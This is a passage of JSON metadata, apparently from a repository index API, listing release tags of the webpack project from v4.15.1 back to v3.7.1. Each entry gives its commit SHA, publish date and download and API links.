ck/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf